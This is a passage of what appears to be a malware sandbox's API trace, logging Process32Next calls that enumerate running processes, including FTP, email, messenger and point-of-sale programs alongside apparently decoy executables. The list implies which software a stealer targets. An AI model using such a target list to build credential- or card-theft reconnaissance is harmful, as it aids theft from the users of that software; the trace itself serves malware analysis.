[0261.873] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.874] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0261.876] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.877] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0261.879] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.880] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0261.882] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0261.926] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0261.928] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0261.929] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0261.931] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0261.932] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0261.934] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0261.935] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0261.937] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0261.939] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0261.941] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0261.942] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0261.944] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0261.945] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0261.947] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0261.949] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0261.950] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0261.952] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0261.953] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0261.955] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0261.959] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0261.961] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0261.963] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0262.048] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0262.050] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0262.052] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0262.054] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0262.056] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0262.058] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0262.060] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0262.062] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0262.063] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0262.065] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0262.067] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0262.069] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0262.071] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0262.072] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0262.074] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0262.076] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0262.078] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0262.125] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0262.127] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0262.129] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0262.131] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0262.133] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0262.134] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0262.136] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0262.138] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0262.140] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0262.142] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0262.143] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0262.145] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0262.147] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0262.148] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0262.150] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0262.152] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0262.154] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0262.156] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0262.157] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0262.197] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0262.218] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0262.220] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0262.222] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0262.224] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0262.225] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0262.227] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.228] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.235] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0262.237] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.239] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.240] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0262.242] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0262.244] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0262.246] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.248] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0262.249] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0262.251] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, 